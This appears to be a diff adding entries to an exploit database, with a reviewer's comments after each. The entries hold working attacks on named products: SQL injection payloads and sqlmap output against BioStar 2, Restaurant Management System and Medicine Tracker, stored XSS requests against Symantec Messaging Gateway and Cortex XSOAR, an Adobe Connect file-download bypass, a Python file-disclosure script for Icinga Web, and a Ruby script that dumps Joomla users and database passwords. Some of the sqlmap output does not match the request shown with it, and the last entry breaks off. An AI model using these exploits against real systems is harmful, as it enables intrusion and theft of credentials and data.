# Tested on: Windows 10 & Google Chrome, kali linux & firefox
### Summary:
Adobe Connect versions 11.4.5 (and earlier), 12.1.5 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to impact the integrity of a minor feature.
Exploitation of this issue does not require user interaction.
### Description :
There are many web applications in the world, each of which has vulnerabilities due to developer errors, and this is a problem for all of them, and even the best of them, like the "adobe connect" program, have vulnerabilities that occur every month. They are found and fixed by the team.
* What is LFD bug?
LFD bug stands for Local File Disclosure / Download, which generally allows the attacker to read and download files within the server, so it can be considered a very dangerous bug in the web world and programmers must be aware of it. Be careful and maintain security against this bug
* Intruder access level with LFD bug
The level of access using this bug can be even increased to the level of access to the website database in such a way that the hacker reads sensitive files inside the server that contain database entry information and enters the database and by extracting the information The admin will have a high level of access
* Identify vulnerable sites
To search for LFD bugs, you should check the site inputs. If there is no problem with receiving ./ characters, you can do the test to read the files inside the server if they are vulnerable. Enter it and see if it is read or not, or you can use files inside the server such as / etc / passwd / .. and step by step using ../ to return to the previous path to find the passwd file
* And this time the "lfd" in "adobe connect" bug:
To download and exploit files, you must type the file path in the "download-url" variable and the file name and extension in the "name" variable.
You can download the file by writing the file path and file name and extension.
When you have written the file path, file name and extension in the site address variables, a download page from Adobe Connect will open for you, with "Save to My Computer
file name]" written in the download box and a file download link at the bottom of the download box, so you can download the file.
* There are values inside the url that do not allow a file other than this file to be downloaded.
* Values: sco_id and tickets
But if these values are cleared, you will see that reloading is possible without any obstacles
At another address, you can download multiple files as a zip file.
We put the address of the files in front of the variable "ffn" and if we want to add the file, we add the variable "ffn" again and put the address of the file in front of it. The "download_type" variable is also used to specify the zip extension.
### POC :
https://target.com/[folder]/download?download-url=[URL]&name=[file.type]
https://target.com/[folder]/download?output=output&download_type=[Suffix]&ffn=[URL]&baseContentUrl=[base file folder]
### References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22232
https://nvd.nist.gov/vuln/detail/CVE-2023-22232
https://helpx.adobe.com/security/products/connect/apsb23-05.html
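
Review bot: The title calls this a Local File Disclosure, but the Summary describes an Improper Access Control issue resulting in a security feature bypass that affects "the integrity of a minor feature"; the two impact statements need reconciling, with a note of what was actually readable in testing. Most of the Description is a general explanation of LFD bugs; the part specific to Adobe Connect, that the download endpoint honours download-url and name once the sco_id and ticket values are cleared, belongs first. "Save to My Computer" is followed by a stray "file name]" with no opening bracket, and the date field gives a range (2021.01.16-2023.02.17) without saying what the two dates are.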

@ -0,0 +1,97 @@
# Exploit Title: Suprema BioStar 2 v2.8.16 - SQL Injection
# Date: 26/03/2023
# Exploit Author: Yuriy (Vander) Tsarenko (https://www.linkedin.com/in/yuriy-tsarenko-a1453aa4/)
# Vendor Homepage: https://www.supremainc.com/
# Software Link: https://www.supremainc.com/en/platform/hybrid-security-platform-biostar-2.asp
# Software Download: https://support.supremainc.com/en/support/solutions/articles/24000076543--biostar-2-biostar-2-8-16-new-features-and-configuration-guide
# Version: 2.8.16
# Tested on: Windows, Linux
# CVE-2023-27167
## Description
A Boolean-based SQL injection/Time based SQL vulnerability in the page (/api/users/absence?search_month=1) in Suprema BioStar 2 v2.8.16 allows remote unauthenticated attackers to execute remote arbitrary SQL commands through "values" JSON parameter.
## Request PoC #1
'''
POST /api/users/absence?search_month=1 HTTP/1.1
Host: biostar2.server.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
content-type: application/json;charset=UTF-8
content-language: en
bs-session-id: 207c1c3c3b624fcc85b7f0814c4bf548
Content-Length: 204
Origin: https://biostar2.server.net
Connection: close
Referer: https://biostar2.server.net/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["(select*from(select(sleep(4)))a)",4840,20120]}],"orders":[],"total":false}}
'''
Time based SQL injection (set 4 response delays for 8 seconds).
'''
## Request PoC #2
'''
POST /api/users/absence?search_month=1 HTTP/1.1
Host: biostar2.server.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: application/json, text/plain, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
content-type: application/json;charset=UTF-8
content-language: en
bs-session-id: 207c1c3c3b624fcc85b7f0814c4bf548
Content-Length: 188
Origin: https://biostar2.server.net
Connection: close
Referer: https://biostar2.server.net/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["1 and 3523=03523",4840,20120]}],"orders":[],"total":false}}
'''
Boolean-based SQL injection (payload “1 and 3523=03523” means “1 and True”, so we can see information in response, regarding user with id 1, which is admin)
'''
## Exploit with SQLmap
Save the request from Burp Suite to file.
'''
---
Parameter: JSON #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: {"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["1 and 3523=03523",4840,20120]}],"orders":[],"total":false}}
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: {"Query":{"offset":0,"limit":51,"atLeastOneFilterExists":true,"conditions":[{"column":"user_group_id.id","operator":2,"values":["(select*from(select(sleep(7)))a)",4840,20120]}],"orders":[],"total":false}}
---
[05:02:49] [INFO] testing MySQL
[05:02:49] [INFO] confirming MySQL
[05:02:50] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL > 5.0.0 (MariaDB fork)
[05:02:50] [INFO] fetching database names
[05:02:50] [INFO] fetching number of databases
[05:02:54] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[05:02:55] [INFO] retrieved: 2
[05:03:12] [INFO] retrieved: biostar2_ac
[05:03:56] [INFO] retrieved: information_schema
available databases [2]:
[*] biostar2_ac
[*] information schema
'''
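
Review bot: the description says the endpoint is exploitable by unauthenticated attackers, yet both PoC requests send a `bs-session-id` header; state whether the injection still works without that header, or change "unauthenticated" in the description. The `'''` delimiters are unbalanced (each request's closing marker is followed by a sentence and another `'''`), the note "set 4 response delays for 8 seconds" does not explain why `sleep(4)` produces an 8 second delay, and the "Exploit with SQLmap" section gives no command line between "Save the request from Burp Suite to file." and the output. The final database list prints `information schema` where the log line above it retrieved `information_schema`.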


@ -0,0 +1,46 @@
# Exploit Title: Symantec Messaging Gateway 10.7.4 - Stored Cross-Site Scripting (XSS)
# Exploit Author: omurugur
# Vendor Homepage: https://support.broadcom.com/external/content/SecurityAdvisories/0/21117
# Version: 10.7.4-10.7.13
# Tested on: [relevant os]
# CVE : CVE-2022-25630
# Author Web: https://www.justsecnow.com
# Author Social: @omurugurrr
An authenticated user can embed malicious content with XSS into the admin
group policy page.
Example payload
*"/><svg/onload=prompt(document.domain)>*
POST /brightmail/admin/administration/AdminGroupPolicyFlow$save.flo
HTTP/1.1
Host: X.X.X.X
Cookie: JSESSIONID=xxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0)
Gecko/20100101 Firefox/99.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 652
Origin: https://x.x.x.x
Referer:
https://x.x.x.x/brightmail/admin/administration/AdminGroupPolicyFlow$add.flo
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
pageReuseFor=add&symantec.brightmail.key.TOKEN=xxx&adminGroupName=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28location%29%3E&adminGroupDescription=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28location%29%3E&adminGroupDescription=&fullAdminRole=true&statusRole=true&statusViewOnly=false&reportRole=true&reportViewOnly=false&policyRole=true&policyViewOnly=false&settingRole=true&settingViewOnly=false&adminRole=true&adminViewOnly=false&submitRole=true&submitViewOnly=false&quarantineRole=true&quarantineViewOnly=false&selectedFolderRights=2&ids=0&complianceFolderIds=1&selectedFolderRights=2&ids=0&complianceFolderIds=10000000
Regards,
Omur UGUR
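
Review bot: the "Example payload" line shows `"/><svg/onload=prompt(document.domain)>`, but the request body sends a different payload (`"><img src=x onerror=prompt(location)>`, URL-encoded) in `adminGroupName` and `adminGroupDescription`; show one payload consistently and name the affected parameters in the text. `# Tested on: [relevant os]` is an unfilled template placeholder, there is no `# Date:` field, and `adminGroupDescription` appears twice in the body, the second time empty.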


@ -0,0 +1,44 @@
# Exploit Title: Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS)
# Exploit Author: omurugur
# Vendor Homepage: https://security.paloaltonetworks.com/CVE-2022-0020
# Version: 6.5.0 - 6.2.0 - 6.1.0
# Tested on: [relevant os]
# CVE : CVE-2022-0020
# Author Web: https://www.justsecnow.com
# Author Social: @omurugurrr
A stored cross-site scripting (XSS) vulnerability in Palo Alto Network
Cortex XSOAR web interface enables an authenticated network-based attacker
to store a persistent javascript payload that will perform arbitrary
actions in the Cortex XSOAR web interface on behalf of authenticated
administrators who encounter the payload during normal operations.
POST /acc_UAB(MAY)/incidentfield HTTP/1.1
Host: x.x.x.x
Cookie: XSRF-TOKEN=xI=; inc-term=x=; S=x+x+x+x/x==; S-Expiration=x;
isTimLicense=false
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0)
Gecko/20100101 Firefox/94.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://x.x.x.x/acc_UAB(MAY)
Content-Type: application/json
X-Xsrf-Token:
Api_truncate_results: true
Origin: https://x.x.x.x
Content-Length: 373
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
{"associatedToAll":true,"caseInsensitive":true,"sla":0,"shouldCommit":true,"threshold":72,"propagationLabels":["all"],"name":"\"/><svg/onload=prompt(document.domain)>","editForm":true,"commitMessage":"Field
edited","type":"html","unsearchable":false,"breachScript":"","shouldPublish":true,"description":"\"/><svg/onload=prompt(document.domain)>","group":0,"required":false}
Regards,
Omur UGUR
>
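
Review bot: `# Tested on: [relevant os]` is still the template placeholder, and `# Version: 6.5.0 - 6.2.0 - 6.1.0` does not say whether it is a list of three versions or a range; fill in the test platform and write the affected versions unambiguously. The JSON body is broken across two lines inside the `commitMessage` string ("Field" / "edited"), so it is not valid JSON as pasted, the `X-Xsrf-Token:` header is empty, and the stray `>` after the signature should be dropped.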


@ -1,32 +0,0 @@
# Exploit Title: GLPI v10.0.1 - Unauthenticated Sensitive Data Exposure
# Date: 11 Jun 2022
# Version: >=10.0.0 and < 10.0.2
# Author: Nuri Çilengir
# Vendor Homepage: https://glpi-project.org/
# Software Link: https://github.com/glpi-project/glpi
# Advisory:
https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/
# Tested on: Ubuntu 22.04
# CVE: CVE-2022-31068
--
*Nuri Çilengir*
/Cyber Security Consultant/
*PRODAFT SARL*
*CH:* Y-Parc, rue Galilée 7, 1400 Yverdon-les-Bains
*TR:* Sanayi Mah. Teknopark Istanbul 5. Blok K2 Pendik, Istanbul
*NL:* HSD Campus Wilhelmina van Pruisenweg 104, 2595 AN, Den Haag
GSM: (+90) 553 444 7080
E.:nuri[at]prodaft[dot]com
IN:/cilengirnuri
/* In case you think youre not the designated recipient of the e-mail
hereby; please delete it accordingly./
/** This e-mail may have been sent from a mobile device. Please contact
me from my mobile, in case you notice an error in the content./
/PS. Feel free to contact me via Signal, Threema or Telegram; or ask for
my public PGP key for high-profile cases that may require higher
confidentiality./
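
Review bot: no description or proof of concept exists anywhere in these 32 removed lines, only header fields and the submitter's e-mail signature (office addresses, a GSM number, an e-mail address), so removing the file is justified. The commit's change list still names "GLPI v10.0.1 - Unauthenticated Sensitive Data Exposure"; confirm that whatever replaces this file carries the actual advisory content and leaves the signature block out.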

68
exploits/php/webapps/51329.py Executable file

@ -0,0 +1,68 @@
#!/usr/bin/env python3
# Exploit Title: Icinga Web 2.10 - Arbitrary File Disclosure
# Date: 2023-03-19
# Exploit Author: Jacob Ebben
# Vendor Homepage: https://icinga.com/
# Software Link: https://github.com/Icinga/icingaweb2
# Version: <2.8.6, <2.9.6, <2.10
# Tested on: Icinga Web 2 Version 2.9.2 on Linux
# CVE: CVE-2022-24716
# Based on: https://www.sonarsource.com/blog/path-traversal-vulnerabilities-in-icinga-web/
import argparse
import requests
from termcolor import colored
def print_message(message, type):
if type == 'SUCCESS':
print('[' + colored('SUCCESS', 'green') + '] ' + message)
elif type == 'INFO':
print('[' + colored('INFO', 'blue') + '] ' + message)
elif type == 'WARNING':
print('[' + colored('WARNING', 'yellow') + '] ' + message)
elif type == 'ALERT':
print('[' + colored('ALERT', 'yellow') + '] ' + message)
elif type == 'ERROR':
print('[' + colored('ERROR', 'red') + '] ' + message)
def get_normalized_url(url):
if url[-1] != '/':
url += '/'
if url[0:7].lower() != 'http://' and url[0:8].lower() != 'https://':
url = "http://" + url
return url
def get_proxy_protocol(url):
if url[0:8].lower() == 'https://':
return 'https'
return 'http'
parser = argparse.ArgumentParser(description='Arbitrary File Disclosure Vulnerability in Icinga Web <2.8.6, <2.9.6, <2.10')
parser.add_argument('TARGET', type=str,
help='Target Icinga location (Example: http://localhost:8080/icinga2/ or https://victim.xyz/icinga/)')
parser.add_argument('FILE', type=str,
help='Filename to gather from exploit (Example: "/etc/passwd" or "/etc/icingaweb2/config.ini")')
parser.add_argument('-P','--proxy', type=str,
help='HTTP proxy address (Example: http://127.0.0.1:8080/)')
args = parser.parse_args()
if args.proxy:
proxy_url = get_normalized_url(args.proxy)
proxy_protocol = get_proxy_protocol(proxy_url)
proxies = { proxy_protocol: proxy_url }
else:
proxies = {}
base_url = get_normalized_url(args.TARGET)
exploit_url = base_url + "lib/icinga/icinga-php-thirdparty" + args.FILE
request = requests.get(base_url, proxies=proxies)
if request.status_code == 404:
print_message("Could not connect to provided URL!", "ERROR")
exit()
request = requests.get(exploit_url, proxies=proxies)
file_content = request.text
print(file_content)
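
Review bot: the title says "Icinga Web 2.10" while `# Version: <2.8.6, <2.9.6, <2.10` excludes 2.10; make the title and the version field agree. In the script, the body of the second `requests.get(exploit_url, proxies=proxies)` is printed without looking at `status_code`, so an error page returned by a patched or unaffected server is shown as if it were file content; check the status before printing. The reachability test treats only a 404 as failure, neither request sets a timeout, and the `type` parameter of `print_message` shadows the built-in.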


@ -0,0 +1,17 @@
# Exploit Title: Restaurant Management System 1.0 - SQL Injection
# Date: 2023-03-20
# Exploit Author: calfcrusher (calfcrusher@inventati.org)
# Vendor Homepage: https://www.sourcecodester.com/users/lewa
# Software Link:
https://www.sourcecodester.com/php/11815/restaurant-management-system.html
# Version: 1.0
# Tested on: Apache 2.4.6, PHP 5.4.16
Endpoint: /rms/delete-order.php
Vulnerable parameter: id (GET)
Time Base SQL Injection payloads
http://example.com/rms/delete-order.php?id=1'or+sleep(5)%3b%23
http://example.com/rms/delete-order.php?id=122'+and+(select+1+from+(select(sleep(3)))calf)--
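
Review bot: nothing in the entry says whether `/rms/delete-order.php` requires a logged-in session, which decides the severity; add that together with a one-line description of the issue above the payloads. "Time Base SQL Injection payloads" should read "Time-based SQL injection payloads".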

132
exploits/php/webapps/51334.py Executable file
View file

@ -0,0 +1,132 @@
#!/usr/bin/env ruby
# Exploit
## Title: Joomla! v4.2.8 - Unauthenticated information disclosure
## Exploit author: noraj (Alexandre ZANNI) for ACCEIS (https://www.acceis.fr)
## Author website: https://pwn.by/noraj/
## Exploit source: https://github.com/Acceis/exploit-CVE-2023-23752
## Date: 2023-03-24
## Vendor Homepage: https://www.joomla.org/
## Software Link: https://downloads.joomla.org/cms/joomla4/4-2-7/Joomla_4-2-7-Stable-Full_Package.tar.gz?format=gz
## Version: 4.0.0 < 4.2.8 (it means from 4.0.0 up to 4.2.7)
## Tested on: Joomla! Version 4.2.7
## CVE : CVE-2023-23752
## References:
## - https://nsfocusglobal.com/joomla-unauthorized-access-vulnerability-cve-2023-23752-notice/
## - https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html
## - https://attackerkb.com/topics/18qrh3PXIX/cve-2023-23752
## - https://nvd.nist.gov/vuln/detail/CVE-2023-23752
## - https://vulncheck.com/blog/joomla-for-rce
## - https://github.com/projectdiscovery/nuclei-templates/blob/main/cves/2023/CVE-2023-23752.yaml
# standard library
require 'json'
# gems
require 'httpx'
require 'docopt'
require 'paint'
doc = <<~DOCOPT
#{Paint['Joomla! < 4.2.8 - Unauthenticated information disclosure', :bold]}
#{Paint['Usage:', :red]}
#{__FILE__} <url> [options]
#{__FILE__} -h | --help
#{Paint['Parameters:', :red]}
<url> Root URL (base path) including HTTP scheme, port and root folder
#{Paint['Options:', :red]}
--debug Display arguments
--no-color Disable colorized output (NO_COLOR environment variable is respected too)
-h, --help Show this screen
#{Paint['Examples:', :red]}
#{__FILE__} http://127.0.0.1:4242
#{__FILE__} https://example.org/subdir
#{Paint['Project:', :red]}
#{Paint['author', :underline]} (https://pwn.by/noraj / https://twitter.com/noraj_rawsec)
#{Paint['company', :underline]} (https://www.acceis.fr / https://twitter.com/acceis)
#{Paint['source', :underline]} (https://github.com/Acceis/exploit-CVE-2023-23752)
DOCOPT
def fetch_users(root_url, http)
vuln_url = "#{root_url}/api/index.php/v1/users?public=true"
http.get(vuln_url)
end
def parse_users(root_url, http)
data_json = fetch_users(root_url, http)
data = JSON.parse(data_json)['data']
users = []
data.each do |user|
if user['type'] == 'users'
id = user['attributes']['id']
name = user['attributes']['name']
username = user['attributes']['username']
email = user['attributes']['email']
groups = user['attributes']['group_names']
users << {id: id, name: name, username: username, email: email, groups: groups}
end
end
users
end
def display_users(root_url, http)
users = parse_users(root_url, http)
puts Paint['Users', :red, :bold]
users.each do |u|
puts "[#{u[:id]}] #{u[:name]} (#{Paint[u[:username], :yellow]}) - #{u[:email]} - #{u[:groups]}"
end
end
def fetch_config(root_url, http)
vuln_url = "#{root_url}/api/index.php/v1/config/application?public=true"
http.get(vuln_url)
end
def parse_config(root_url, http)
data_json = fetch_config(root_url, http)
data = JSON.parse(data_json)['data']
config = {}
data.each do |entry|
if entry['type'] == 'application'
key = entry['attributes'].keys.first
config[key] = entry['attributes'][key]
end
end
config
end
def display_config(root_url, http)
c = parse_config(root_url, http)
puts Paint['Site info', :red, :bold]
puts "Site name: #{c['sitename']}"
puts "Editor: #{c['editor']}"
puts "Captcha: #{c['captcha']}"
puts "Access: #{c['access']}"
puts "Debug status: #{c['debug']}"
puts
puts Paint['Database info', :red, :bold]
puts "DB type: #{c['dbtype']}"
puts "DB host: #{c['host']}"
puts "DB user: #{Paint[c['user'], :yellow, :bold]}"
puts "DB password: #{Paint[c['password'], :yellow, :bold]}"
puts "DB name: #{c['db']}"
puts "DB prefix: #{c['dbprefix']}"
puts "DB encryption #{c['dbencryption']}"
end
begin
args = Docopt.docopt(doc)
Paint.mode = 0 if args['--no-color']
puts args if args['--debug']
http = HTTPX
display_users(args['<url>'], http)
puts
display_config(args['<url>'], http)
rescue Docopt::Exit => e
puts e.message
end
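
Review bot: the file is added as `exploits/php/webapps/51334.py`, but its shebang is `#!/usr/bin/env ruby` and the body is Ruby (`require 'httpx'`, `def ... end`); give it an `.rb` extension so it is not handed to a Python interpreter. `parse_users` and `parse_config` pass the result of `http.get` straight to `JSON.parse` without checking the response status, so a site that answers with an error ends in an unhandled exception instead of a clear "not vulnerable" message. `puts "DB encryption #{c['dbencryption']}"` is missing the colon used on the other lines.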


@ -0,0 +1,40 @@
# Exploit Title: Online Appointment System V1.0 - Cross-Site Scripting (XSS)
# Date: 25/02/2023
# Exploit Author: Sanjay Singh
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14502/online-appointment-system-php-full-source-code-2020.html
# Tested on: Windows
use payload="><script>alert(XSS)</script>
1. visit-http://localhost/doctor/applicationlayer/Doctorpatient.php
2. login Doctor account with default credential
3. Click left side add description
4. capture request and put payload
http://localhost/doctor/presentaionlayer/doctor/add.php/wrycv%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
request
GET /doctor/presentaionlayer/doctor/add.php/wrycv%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E HTTP/1.1
Host: localhost
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="111", "Not(A:Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=ocj11iinu8pn536i3cdia0faql
Connection: close
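
Review bot: the header has no `# Version:` field although the title says V1.0, and the title does not say whether the XSS is reflected or stored, even though the request shown is a single GET with the payload in the path after `add.php/`; state the type explicitly. The payload line uses `alert(XSS)` without quotes while the URL uses `alert("XSS")`, and steps 1 to 4 describe logging in and adding a description without saying how they relate to that GET request.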


@ -0,0 +1,126 @@
# Exploit Title: Medicine Tracker System v1.0 - Sql Injection
# Exploit Author: Sanjay Singh
# Vendor Homepage: https://www.sourcecodester.com
# Software Link:
https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-mts_0.zip
# Version: V1.0.0
# Tested on: Windows/Linux
# Proof of Concept:
# 1- http://localhost/php-mts/app/login.php
# 2- login with default credential
# 3- Click left side Manage account and fill Update User Details and click update account
# 4- Capture request using burp suite
# 5- Save request request.txt
Sqlmap
POST /php-mts/classes/Users.php?f=save_user HTTP/1.1
Host: localhost
Content-Length: 661
sec-ch-ua: "Chromium";v="111", "Not(A:Brand";v="8"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeOo3CzyRX6fHexZx
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/php-mts/app/?page=manage_account
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=ocj11iinu8pn536i3cdia0faql
Connection: close
------WebKitFormBoundaryeOo3CzyRX6fHexZx
Content-Disposition: form-data; name="id"
1'-'
------WebKitFormBoundaryeOo3CzyRX6fHexZx
Content-Disposition: form-data; name="firstname"
gogo
------WebKitFormBoundaryeOo3CzyRX6fHexZx
Content-Disposition: form-data; name="middlename"
ogo
------WebKitFormBoundaryeOo3CzyRX6fHexZx
Content-Disposition: form-data; name="lastname"
singh
------WebKitFormBoundaryeOo3CzyRX6fHexZx
Content-Disposition: form-data; name="username"
mayuri.infospace@gmail.com
------WebKitFormBoundaryeOo3CzyRX6fHexZx
Content-Disposition: form-data; name="password"
12345678
------WebKitFormBoundaryeOo3CzyRX6fHexZx--
sqlmap
sqlmap -r request.txt -p "id" --dbs --batch
___
__H__
___ ___["]_____ ___ ___ {1.6.12#stable}
|_ -| . ['] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:18:01 /2023-03-21/
[13:18:01] [INFO] parsing HTTP request from 'request.txt'
it appears that provided value for POST parameter 'id' has boundaries. Do you want to inject inside? ('' or true*--') [y/N] N
[13:18:01] [INFO] resuming back-end DBMS 'mysql'
[13:18:01] [INFO] testing connection to the target URL
[13:18:01] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=' or true AND (SELECT 3138 FROM(SELECT COUNT(*),CONCAT(0x7178787171,(SELECT (ELT(3138=3138,1))),0x717a6b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- mDhI--&name=para&description=ss
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=' or true AND (SELECT 8994 FROM (SELECT(SLEEP(5)))doso)-- HjCh--&name=para&description=ss
---
[13:18:01] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.54, PHP 8.0.25
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[13:18:01] [INFO] fetching database names
[13:18:01] [INFO] resumed: 'information_schema'
[13:18:01] [INFO] resumed: 'art_gallery'
[13:18:01] [INFO] resumed: 'hcpms'
[13:18:01] [INFO] resumed: 'mts_db'
[13:18:01] [INFO] resumed: 'mysql'
[13:18:01] [INFO] resumed: 'performance_schema'
[13:18:01] [INFO] resumed: 'phpmyadmin'
[13:18:01] [INFO] resumed: 'sscdms_db'
[13:18:01] [INFO] resumed: 'test'
available databases [9]:
[*] art_gallery
[*] hcpms
[*] information_schema
[*] mts_db
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] sscdms_db
[*] test
[13:18:01] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.1.2'
[*] ending @ 13:18:01 /2023-03-21/
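
Review bot: the sqlmap output does not belong to the request above it: the log says the injection points were resumed from a stored session, the resumed payloads end in `&name=para&description=ss` (fields absent from the multipart `save_user` request), and results are logged under `192.168.1.2` while the request targets `localhost`. Replace it with output from a fresh run against `request.txt`. The request body also includes what looks like a real e-mail address and a password in the `username` and `password` parts; swap them for placeholders.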


@ -0,0 +1,57 @@
## Exploit Title: Online-Pizza-Ordering -1.0 - Remote Code Execution (RCE)
## Author: nu11secur1ty
## Date: 03.30.2023
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html
## Reference: https://portswigger.net/web-security/file-upload
## Description:
The malicious user can request an account from the administrator of
this system.
Then he can use this vulnerability to destroy or get access to all
accounts of this system, even more, worst than ever.
The malicious user can upload a very dangerous file on this server,
and he can execute it via shell,
this is because he can access the upload function from the
administrator account.
The status is CRITICAL.
STATUS: HIGH Vulnerability
[+]Exploit:
```mysql
<?php
// by nu11secur1ty - 2023
// Old Name Of The file
$old_name = "C:/xampp7/htdocs/pwnedhost17/php-opos17" ;
// New Name For The File
$new_name = "C:/xampp7/htdocs/pwnedhost17/php-opos" ;
// using rename() function to rename the file
rename( $old_name, $new_name) ;
?>
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Online-Pizza-Ordering-1.0)
## Proof and Exploit:
[href](https://streamable.com/szb9qy)
## Time spend:
00:45:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
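
Review bot: the PHP under `[+]Exploit:` only calls `rename()` on a local directory path and identifies neither the upload endpoint nor the parameter involved, so the entry does not show the remote code execution named in the title; name the affected upload function so the issue can be located and fixed. The fence is tagged `mysql` although it contains PHP, and the description rates the issue both "CRITICAL" and "HIGH".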


@ -0,0 +1,46 @@
# Exploit Title: X2CRM v6.6/6.9 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Exploit Author: Betul Denizler
# Vendor Homepage: https://x2crm.com/
# Software Link: https://sourceforge.net/projects/x2engine/
# Version: X2CRM v6.6/6.9
# Tested on: Ubuntu Mate 20.04
# Vulnerable Parameter: Actions[subject]
# CVE: CVE-2022-48178
# Date: 27.12.2022
'''
POC REQUEST:
========
POST /c2xrm/x2engine/index.php/actions/update?id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0)
Gecko/20100101 Firefox/108.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 172
Origin: http://localhost
Connection: close
Referer:
http://localhost/c2xrm/x2engine/index.php/actions/viewAction?id=1
Cookie: LoginForm[username]=admin; LoginForm[rememberMe]=1;
PHPSESSID=kg3n7kcjqtm29fc7n4m72m0bt5;
YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab;
